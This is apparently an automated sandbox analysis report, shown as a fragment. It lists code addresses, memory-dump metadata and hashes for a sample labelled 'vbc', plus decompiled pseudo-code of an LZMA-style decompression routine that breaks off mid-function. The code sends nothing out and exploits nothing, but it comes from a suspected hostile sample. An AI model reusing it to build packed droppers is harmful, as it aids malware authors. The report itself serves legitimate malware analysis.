                                                0x00407091
                                                0x00407092
                                                0x00407095
                                                0x0040706b
                                                0x0040706b
                                                0x00407073
                                                0x00407078
                                                0x0040707a
                                                0x0040707d
                                                0x0040707d
                                                0x00407098
                                                0x0040709f
                                                0x00000000
                                                0x004070a1
                                                0x00000000
                                                0x004070a1
                                                0x00000000
                                                0x00406d3d
                                                0x00406d40
                                                0x00406d76
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406ea9
                                                0x00406eac
                                                0x00406eae
                                                0x00407138
                                                0x00000000
                                                0x00407138
                                                0x00406eb4
                                                0x00406eb7
                                                0x00000000
                                                0x00000000
                                                0x00406ebd
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec4
                                                0x00406ec4
                                                0x00000000
                                                0x00406ec4
                                                0x00406d42
                                                0x00406d44
                                                0x00406d46
                                                0x00406d48
                                                0x00406d4b
                                                0x00406d4c
                                                0x00406d4e
                                                0x00406d50
                                                0x00406d53
                                                0x00406d56
                                                0x00406d6c
                                                0x00406d71
                                                0x00406da9
                                                0x00406da9
                                                0x00406dad
                                                0x00406dd9
                                                0x00406ddb
                                                0x00406de2
                                                0x00406de5
                                                0x00406de8
                                                0x00406de8
                                                0x00406ded
                                                0x00406ded
                                                0x00406def
                                                0x00406df2
                                                0x00406df9
                                                0x00406dfc
                                                0x00406e29
                                                0x00406e29
                                                0x00406e2c
                                                0x00406e2f
                                                0x00406ea3
                                                0x00406ea3
                                                0x00406ea3
                                                0x00000000
                                                0x00406ea3
                                                0x00406e31
                                                0x00406e37
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e40
                                                0x00406e43
                                                0x00406e46
                                                0x00406e49
                                                0x00406e4c
                                                0x00406e4f
                                                0x00406e52
                                                0x00406e6b
                                                0x00406e6d
                                                0x00406e70
                                                0x00406e71
                                                0x00406e74
                                                0x00406e76
                                                0x00406e79
                                                0x00406e7b
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e82
                                                0x00406e85
                                                0x00406e89
                                                0x00406e8b
                                                0x00406e8b
                                                0x00406e8c
                                                0x00406e8f
                                                0x00406e92
                                                0x00406e54
                                                0x00406e54
                                                0x00406e5c
                                                0x00406e61
                                                0x00406e63
                                                0x00406e66
                                                0x00406e66
                                                0x00406e95
                                                0x00406e9c
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00406e26
                                                0x00000000
                                                0x00406e9e
                                                0x00000000
                                                0x00406e9e
                                                0x00406e9c
                                                0x00406daf
                                                0x00406db2
                                                0x00406db4
                                                0x00406db7
                                                0x00406dba
                                                0x00406dbd
                                                0x00406dbf
                                                0x00406dc2
                                                0x00406dc5
                                                0x00406dc5
                                                0x00406dc8
                                                0x00406dc8
                                                0x00406dcb
                                                0x00406dd2
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00406da6
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406d58
                                                0x00406d5b
                                                0x00406d5d
                                                0x00406d60
                                                0x00000000
                                                0x00000000
                                                0x00406abf
                                                0x00406abf
                                                0x00406ac3
                                                0x00407108
                                                0x00000000
                                                0x00407108
                                                0x00406ac9
                                                0x00406acc
                                                0x00406acf
                                                0x00406ad2
                                                0x00406ad5
                                                0x00406ad8
                                                0x00406adb
                                                0x00406add
                                                0x00406ae0
                                                0x00406ae3
                                                0x00406ae6
                                                0x00406ae8
                                                0x00406ae8
                                                0x00406ae8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ec7
                                                0x00406ecb
                                                0x00000000
                                                0x00000000
                                                0x00406ed1
                                                0x00406ed4
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edc
                                                0x00406edc
                                                0x00406edc
                                                0x00406edf
                                                0x00406ee2
                                                0x00406ee5
                                                0x00406ee8
                                                0x00406eeb
                                                0x00406eee
                                                0x00406eef
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef4
                                                0x00406ef7
                                                0x00406efa
                                                0x00406efd
                                                0x00406f00
                                                0x00406f04
                                                0x00406f06
                                                0x00406f09
                                                0x00000000
                                                0x00406f0b
                                                0x00000000
                                                0x00406f0b
                                                0x00406f09
                                                0x0040713e
                                                0x00000000
                                                0x00000000
                                                0x0040676d

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
                                                • Instruction ID: 7ea7bfe366fdde138a2213b1adeace564b33d0438ed0be708c4ee64e1a3b53a1
                                                • Opcode Fuzzy Hash: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
                                                • Instruction Fuzzy Hash: 50814531D04228DFDF24CFA8C884BADBBB1FB44305F25816AD856BB291C7789996CF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E0040672B(void* __ecx) {
                                                				void* _v8;
                                                				void* _v12;
                                                				signed int _v16;
                                                				unsigned int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				signed int _v64;
                                                				signed int _v68;
                                                				signed int _v72;
                                                				signed int _v76;
                                                				signed int _v80;
                                                				signed int _v84;
                                                				signed int _v88;
                                                				signed int _v92;
                                                				signed int _v95;
                                                				signed int _v96;
                                                				signed int _v100;
                                                				signed int _v104;
                                                				signed int _v108;
                                                				signed int _v112;
                                                				signed int _v116;
                                                				signed int _v120;
                                                				intOrPtr _v124;
                                                				signed int _v128;
                                                				signed int _v132;
                                                				signed int _v136;
                                                				void _v140;
                                                				void* _v148;
                                                				signed int _t537;
                                                				signed int _t538;
                                                				signed int _t572;
                                                
                                                				_t572 = 0x22;
                                                				_v148 = __ecx;
                                                				memcpy( &_v140, __ecx, _t572 << 2);
                                                				if(_v52 == 0xffffffff) {
                                                					return 1;
                                                				}
                                                				while(1) {
                                                					L3:
                                                					_t537 = _v140;
                                                					if(_t537 > 0x1c) {
                                                						break;
                                                					}
                                                					switch( *((intOrPtr*)(_t537 * 4 +  &M0040717D))) {
                                                						case 0:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								goto L173;
                                                							}
                                                							_v112 = _v112 - 1;
                                                							_v116 = _v116 + 1;
                                                							_t537 =  *_v116;
                                                							__eflags = _t537 - 0xe1;
                                                							if(_t537 > 0xe1) {
                                                								goto L174;
                                                							}
                                                							_t542 = _t537 & 0x000000ff;
                                                							_push(0x2d);
                                                							asm("cdq");
                                                							_pop(_t576);
                                                							_push(9);
                                                							_pop(_t577);
                                                							_t622 = _t542 / _t576;
                                                							_t544 = _t542 % _t576 & 0x000000ff;
                                                							asm("cdq");
                                                							_t617 = _t544 % _t577 & 0x000000ff;
                                                							_v64 = _t617;
                                                							_v32 = (1 << _t622) - 1;
                                                							_v28 = (1 << _t544 / _t577) - 1;
                                                							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                							__eflags = 0x600 - _v124;
                                                							if(0x600 == _v124) {
                                                								L12:
                                                								__eflags = _t625;
                                                								if(_t625 == 0) {
                                                									L14:
                                                									_v76 = _v76 & 0x00000000;
                                                									_v68 = _v68 & 0x00000000;
                                                									goto L17;
                                                								} else {
                                                									goto L13;
                                                								}
                                                								do {
                                                									L13:
                                                									_t625 = _t625 - 1;
                                                									__eflags = _t625;
                                                									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                								} while (_t625 != 0);
                                                								goto L14;
                                                							}
                                                							__eflags = _v8;
                                                							if(_v8 != 0) {
                                                								GlobalFree(_v8);
                                                							}
                                                							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                							__eflags = _t537;
                                                							_v8 = _t537;
                                                							if(_t537 == 0) {
                                                								goto L174;
                                                							} else {
                                                								_v124 = 0x600;
                                                								goto L12;
                                                							}
                                                						case 1:
                                                							L15:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 1;
                                                								goto L173;
                                                							}
                                                							_v112 = _v112 - 1;
                                                							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                							_v116 = _v116 + 1;
                                                							_t50 =  &_v76;
                                                							 *_t50 = _v76 + 1;
                                                							__eflags =  *_t50;
                                                							L17:
                                                							__eflags = _v76 - 4;
                                                							if(_v76 < 4) {
                                                								goto L15;
                                                							}
                                                							_t550 = _v68;
                                                							__eflags = _t550 - _v120;
                                                							if(_t550 == _v120) {
                                                								L22:
                                                								_v76 = 5;
                                                								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                								goto L25;
                                                							}
                                                							__eflags = _v12;
                                                							_v120 = _t550;
                                                							if(_v12 != 0) {
                                                								GlobalFree(_v12);
                                                							}
                                                							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                							__eflags = _t537;
                                                							_v12 = _t537;
                                                							if(_t537 == 0) {
                                                								goto L174;
                                                							} else {
                                                								goto L22;
                                                							}
                                                						case 2:
                                                							L26:
                                                							_t557 = _v100 & _v32;
                                                							_v136 = 6;
                                                							_v80 = _t557;
                                                							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                							goto L135;
                                                						case 3:
                                                							L23:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 3;
                                                								goto L173;
                                                							}
                                                							_v112 = _v112 - 1;
                                                							_t72 =  &_v116;
                                                							 *_t72 = _v116 + 1;
                                                							__eflags =  *_t72;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							L25:
                                                							_v76 = _v76 - 1;
                                                							__eflags = _v76;
                                                							if(_v76 != 0) {
                                                								goto L23;
                                                							}
                                                							goto L26;
                                                						case 4:
                                                							L136:
                                                							_t559 =  *_t626;
                                                							_t610 = _t559 & 0x0000ffff;
                                                							_t591 = (_v20 >> 0xb) * _t610;
                                                							__eflags = _v16 - _t591;
                                                							if(_v16 >= _t591) {
                                                								_v20 = _v20 - _t591;
                                                								_v16 = _v16 - _t591;
                                                								_v68 = 1;
                                                								_t560 = _t559 - (_t559 >> 5);
                                                								__eflags = _t560;
                                                								 *_t626 = _t560;
                                                							} else {
                                                								_v20 = _t591;
                                                								_v68 = _v68 & 0x00000000;
                                                								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                							}
                                                							__eflags = _v20 - 0x1000000;
                                                							if(_v20 >= 0x1000000) {
                                                								goto L142;
                                                							} else {
                                                								goto L140;
                                                							}
                                                						case 5:
                                                							L140:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 5;
                                                								goto L173;
                                                							}
                                                							_v20 = _v20 << 8;
                                                							_v112 = _v112 - 1;
                                                							_t464 =  &_v116;
                                                							 *_t464 = _v116 + 1;
                                                							__eflags =  *_t464;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							L142:
                                                							_t561 = _v136;
                                                							goto L143;
                                                						case 6:
                                                							__edx = 0;
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								__eax = _v8;
                                                								__ecx = _v60;
                                                								_v56 = 1;
                                                								_v136 = 7;
                                                								__esi = _v8 + 0x180 + _v60 * 2;
                                                								goto L135;
                                                							}
                                                							__eax = _v96 & 0x000000ff;
                                                							__esi = _v100;
                                                							__cl = 8;
                                                							__cl = 8 - _v64;
                                                							__esi = _v100 & _v28;
                                                							__eax = (_v96 & 0x000000ff) >> 8;
                                                							__ecx = _v64;
                                                							__esi = (_v100 & _v28) << 8;
                                                							__ecx = _v8;
                                                							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                							__eflags = _v60 - 4;
                                                							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                							if(_v60 >= 4) {
                                                								__eflags = _v60 - 0xa;
                                                								if(_v60 >= 0xa) {
                                                									_t103 =  &_v60;
                                                									 *_t103 = _v60 - 6;
                                                									__eflags =  *_t103;
                                                								} else {
                                                									_v60 = _v60 - 3;
                                                								}
                                                							} else {
                                                								_v60 = 0;
                                                							}
                                                							__eflags = _v56 - __edx;
                                                							if(_v56 == __edx) {
                                                								__ebx = 0;
                                                								__ebx = 1;
                                                								goto L63;
                                                							}
                                                							__eax = _v24;
                                                							__eax = _v24 - _v48;
                                                							__eflags = __eax - _v120;
                                                							if(__eax >= _v120) {
                                                								__eax = __eax + _v120;
                                                								__eflags = __eax;
                                                							}
                                                							__ecx = _v12;
                                                							__ebx = 0;
                                                							__ebx = 1;
                                                							__al =  *((intOrPtr*)(__eax + __ecx));
                                                							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                							goto L43;
                                                						case 7:
                                                							__eflags = _v68 - 1;
                                                							if(_v68 != 1) {
                                                								__eax = _v40;
                                                								_v132 = 0x16;
                                                								_v36 = _v40;
                                                								__eax = _v44;
                                                								_v40 = _v44;
                                                								__eax = _v48;
                                                								_v44 = _v48;
                                                								__eax = 0;
                                                								__eflags = _v60 - 7;
                                                								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                								__al = __al & 0x000000fd;
                                                								__eax = (__eflags >= 0) - 1 + 0xa;
                                                								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                								__eax = _v8;
                                                								__eax = _v8 + 0x664;
                                                								__eflags = __eax;
                                                								_v92 = __eax;
                                                								goto L71;
                                                							}
                                                							__eax = _v8;
                                                							__ecx = _v60;
                                                							_v136 = 8;
                                                							__esi = _v8 + 0x198 + _v60 * 2;
                                                							goto L135;
                                                						case 8:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								__eax = _v8;
                                                								__ecx = _v60;
                                                								_v136 = 0xa;
                                                								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                							} else {
                                                								__eax = _v60;
                                                								__ecx = _v8;
                                                								__eax = _v60 + 0xf;
                                                								_v136 = 9;
                                                								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                							}
                                                							goto L135;
                                                						case 9:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								goto L92;
                                                							}
                                                							__eflags = _v100;
                                                							if(_v100 == 0) {
                                                								goto L174;
                                                							}
                                                							__eax = 0;
                                                							__eflags = _v60 - 7;
                                                							_t264 = _v60 - 7 >= 0;
                                                							__eflags = _t264;
                                                							0 | _t264 = _t264 + _t264 + 9;
                                                							_v60 = _t264 + _t264 + 9;
                                                							goto L78;
                                                						case 0xa:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								__eax = _v8;
                                                								__ecx = _v60;
                                                								_v136 = 0xb;
                                                								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                								goto L135;
                                                							}
                                                							__eax = _v44;
                                                							goto L91;
                                                						case 0xb:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								__ecx = _v40;
                                                								__eax = _v36;
                                                								_v36 = _v40;
                                                							} else {
                                                								__eax = _v40;
                                                							}
                                                							__ecx = _v44;
                                                							_v40 = _v44;
                                                							L91:
                                                							__ecx = _v48;
                                                							_v48 = __eax;
                                                							_v44 = _v48;
                                                							L92:
                                                							__eax = _v8;
                                                							_v132 = 0x15;
                                                							__eax = _v8 + 0xa68;
                                                							_v92 = _v8 + 0xa68;
                                                							goto L71;
                                                						case 0xc:
                                                							L102:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0xc;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t340 =  &_v116;
                                                							 *_t340 = _v116 + 1;
                                                							__eflags =  *_t340;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							__eax = _v48;
                                                							goto L104;
                                                						case 0xd:
                                                							L39:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0xd;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t127 =  &_v116;
                                                							 *_t127 = _v116 + 1;
                                                							__eflags =  *_t127;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							L41:
                                                							__eax = _v68;
                                                							__eflags = _v76 - _v68;
                                                							if(_v76 != _v68) {
                                                								goto L50;
                                                							}
                                                							__eflags = __ebx - 0x100;
                                                							if(__ebx >= 0x100) {
                                                								goto L56;
                                                							}
                                                							L43:
                                                							__eax = _v95 & 0x000000ff;
                                                							_v95 = _v95 << 1;
                                                							__ecx = _v92;
                                                							__eax = (_v95 & 0x000000ff) >> 7;
                                                							_v76 = __eax;
                                                							__eax = __eax + 1;
                                                							__eax = __eax << 8;
                                                							__eax = __eax + __ebx;
                                                							__esi = _v92 + __eax * 2;
                                                							_v20 = _v20 >> 0xb;
                                                							__ax =  *__esi;
                                                							_v88 = __esi;
                                                							__edx = __ax & 0x0000ffff;
                                                							__ecx = (_v20 >> 0xb) * __edx;
                                                							__eflags = _v16 - __ecx;
                                                							if(_v16 >= __ecx) {
                                                								_v20 = _v20 - __ecx;
                                                								_v16 = _v16 - __ecx;
                                                								__cx = __ax;
                                                								_v68 = 1;
                                                								__cx = __ax >> 5;
                                                								__eflags = __eax;
                                                								__ebx = __ebx + __ebx + 1;
                                                								 *__esi = __ax;
                                                							} else {
                                                								_v68 = _v68 & 0x00000000;
                                                								_v20 = __ecx;
                                                								0x800 = 0x800 - __edx;
                                                								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags = _v20 - 0x1000000;
                                                							_v72 = __ebx;
                                                							if(_v20 >= 0x1000000) {
                                                								goto L41;
                                                							} else {
                                                								goto L39;
                                                							}
                                                						case 0xe:
                                                							L48:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0xe;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t161 =  &_v116;
                                                							 *_t161 = _v116 + 1;
                                                							__eflags =  *_t161;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							while(1) {
                                                								L50:
                                                								__eflags = __ebx - 0x100;
                                                								if(__ebx >= 0x100) {
                                                									break;
                                                								}
                                                								__eax = _v92;
                                                								__edx = __ebx + __ebx;
                                                								__ecx = _v20;
                                                								__esi = __edx + __eax;
                                                								__ecx = _v20 >> 0xb;
                                                								__ax =  *__esi;
                                                								_v88 = __esi;
                                                								__edi = __ax & 0x0000ffff;
                                                								__ecx = (_v20 >> 0xb) * __edi;
                                                								__eflags = _v16 - __ecx;
                                                								if(_v16 >= __ecx) {
                                                									_v20 = _v20 - __ecx;
                                                									_v16 = _v16 - __ecx;
                                                									__cx = __ax;
                                                									_t175 = __edx + 1; // 0x1
                                                									__ebx = _t175;
                                                									__cx = __ax >> 5;
                                                									__eflags = __eax;
                                                									 *__esi = __ax;
                                                								} else {
                                                									_v20 = __ecx;
                                                									0x800 = 0x800 - __edi;
                                                									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                									__ebx = __ebx + __ebx;
                                                									 *__esi = __cx;
                                                								}
                                                								__eflags = _v20 - 0x1000000;
                                                								_v72 = __ebx;
                                                								if(_v20 >= 0x1000000) {
                                                									continue;
                                                								} else {
                                                									goto L48;
                                                								}
                                                							}
                                                							L56:
                                                							_t178 =  &_v56;
                                                							 *_t178 = _v56 & 0x00000000;
                                                							__eflags =  *_t178;
                                                							goto L57;
                                                						case 0xf:
                                                							L60:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0xf;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t208 =  &_v116;
                                                							 *_t208 = _v116 + 1;
                                                							__eflags =  *_t208;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							L62:
                                                							__eflags = __ebx - 0x100;
                                                							if(__ebx >= 0x100) {
                                                								L57:
                                                								__al = _v72;
                                                								_v96 = _v72;
                                                								goto L58;
                                                							}
                                                							L63:
                                                							__eax = _v92;
                                                							__edx = __ebx + __ebx;
                                                							__ecx = _v20;
                                                							__esi = __edx + __eax;
                                                							__ecx = _v20 >> 0xb;
                                                							__ax =  *__esi;
                                                							_v88 = __esi;
                                                							__edi = __ax & 0x0000ffff;
                                                							__ecx = (_v20 >> 0xb) * __edi;
                                                							__eflags = _v16 - __ecx;
                                                							if(_v16 >= __ecx) {
                                                								_v20 = _v20 - __ecx;
                                                								_v16 = _v16 - __ecx;
                                                								__cx = __ax;
                                                								_t222 = __edx + 1; // 0x1
                                                								__ebx = _t222;
                                                								__cx = __ax >> 5;
                                                								__eflags = __eax;
                                                								 *__esi = __ax;
                                                							} else {
                                                								_v20 = __ecx;
                                                								0x800 = 0x800 - __edi;
                                                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags = _v20 - 0x1000000;
                                                							_v72 = __ebx;
                                                							if(_v20 >= 0x1000000) {
                                                								goto L62;
                                                							} else {
                                                								goto L60;
                                                							}
                                                						case 0x10:
                                                							L112:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0x10;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t371 =  &_v116;
                                                							 *_t371 = _v116 + 1;
                                                							__eflags =  *_t371;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							goto L114;
                                                						case 0x11:
                                                							L71:
                                                							__esi = _v92;
                                                							_v136 = 0x12;
                                                							goto L135;
                                                						case 0x12:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								__eax = _v92;
                                                								_v136 = 0x13;
                                                								__esi = _v92 + 2;
                                                								L135:
                                                								_v88 = _t626;
                                                								goto L136;
                                                							}
                                                							__eax = _v80;
                                                							_v52 = _v52 & 0x00000000;
                                                							__ecx = _v92;
                                                							__eax = _v80 << 4;
                                                							__eflags = __eax;
                                                							__eax = _v92 + __eax + 4;
                                                							goto L133;
                                                						case 0x13:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								_t475 =  &_v92;
                                                								 *_t475 = _v92 + 0x204;
                                                								__eflags =  *_t475;
                                                								_v52 = 0x10;
                                                								_v68 = 8;
                                                								L147:
                                                								_v128 = 0x14;
                                                								goto L148;
                                                							}
                                                							__eax = _v80;
                                                							__ecx = _v92;
                                                							__eax = _v80 << 4;
                                                							_v52 = 8;
                                                							__eax = _v92 + (_v80 << 4) + 0x104;
                                                							L133:
                                                							_v92 = __eax;
                                                							_v68 = 3;
                                                							goto L147;
                                                						case 0x14:
                                                							_v52 = _v52 + __ebx;
                                                							__eax = _v132;
                                                							goto L143;
                                                						case 0x15:
                                                							__eax = 0;
                                                							__eflags = _v60 - 7;
                                                							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                							__al = __al & 0x000000fd;
                                                							__eax = (__eflags >= 0) - 1 + 0xb;
                                                							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                							goto L123;
                                                						case 0x16:
                                                							__eax = _v52;
                                                							__eflags = __eax - 4;
                                                							if(__eax >= 4) {
                                                								_push(3);
                                                								_pop(__eax);
                                                							}
                                                							__ecx = _v8;
                                                							_v68 = 6;
                                                							__eax = __eax << 7;
                                                							_v128 = 0x19;
                                                							_v92 = __eax;
                                                							goto L148;
                                                						case 0x17:
                                                							L148:
                                                							__eax = _v68;
                                                							_v84 = 1;
                                                							_v76 = _v68;
                                                							goto L152;
                                                						case 0x18:
                                                							L149:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0x18;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t490 =  &_v116;
                                                							 *_t490 = _v116 + 1;
                                                							__eflags =  *_t490;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							L151:
                                                							_t493 =  &_v76;
                                                							 *_t493 = _v76 - 1;
                                                							__eflags =  *_t493;
                                                							L152:
                                                							__eflags = _v76;
                                                							if(_v76 <= 0) {
                                                								__ecx = _v68;
                                                								__ebx = _v84;
                                                								0 = 1;
                                                								__eax = 1 << __cl;
                                                								__ebx = _v84 - (1 << __cl);
                                                								__eax = _v128;
                                                								_v72 = __ebx;
                                                								L143:
                                                								_v140 = _t561;
                                                								goto L3;
                                                							}
                                                							__eax = _v84;
                                                							_v20 = _v20 >> 0xb;
                                                							__edx = _v84 + _v84;
                                                							__eax = _v92;
                                                							__esi = __edx + __eax;
                                                							_v88 = __esi;
                                                							__ax =  *__esi;
                                                							__edi = __ax & 0x0000ffff;
                                                							__ecx = (_v20 >> 0xb) * __edi;
                                                							__eflags = _v16 - __ecx;
                                                							if(_v16 >= __ecx) {
                                                								_v20 = _v20 - __ecx;
                                                								_v16 = _v16 - __ecx;
                                                								__cx = __ax;
                                                								__cx = __ax >> 5;
                                                								__eax = __eax - __ecx;
                                                								__edx = __edx + 1;
                                                								__eflags = __edx;
                                                								 *__esi = __ax;
                                                								_v84 = __edx;
                                                							} else {
                                                								_v20 = __ecx;
                                                								0x800 = 0x800 - __edi;
                                                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                								_v84 = _v84 << 1;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags = _v20 - 0x1000000;
                                                							if(_v20 >= 0x1000000) {
                                                								goto L151;
                                                							} else {
                                                								goto L149;
                                                							}
                                                						case 0x19:
                                                							__eflags = __ebx - 4;
                                                							if(__ebx < 4) {
                                                								_v48 = __ebx;
                                                								L122:
                                                								_t399 =  &_v48;
                                                								 *_t399 = _v48 + 1;
                                                								__eflags =  *_t399;
                                                								L123:
                                                								__eax = _v48;
                                                								__eflags = __eax;
                                                								if(__eax == 0) {
                                                									_v52 = _v52 | 0xffffffff;
                                                									goto L173;
                                                								}
                                                								__eflags = __eax - _v100;
                                                								if(__eax > _v100) {
                                                									goto L174;
                                                								}
                                                								_v52 = _v52 + 2;
                                                								__eax = _v52;
                                                								_t406 =  &_v100;
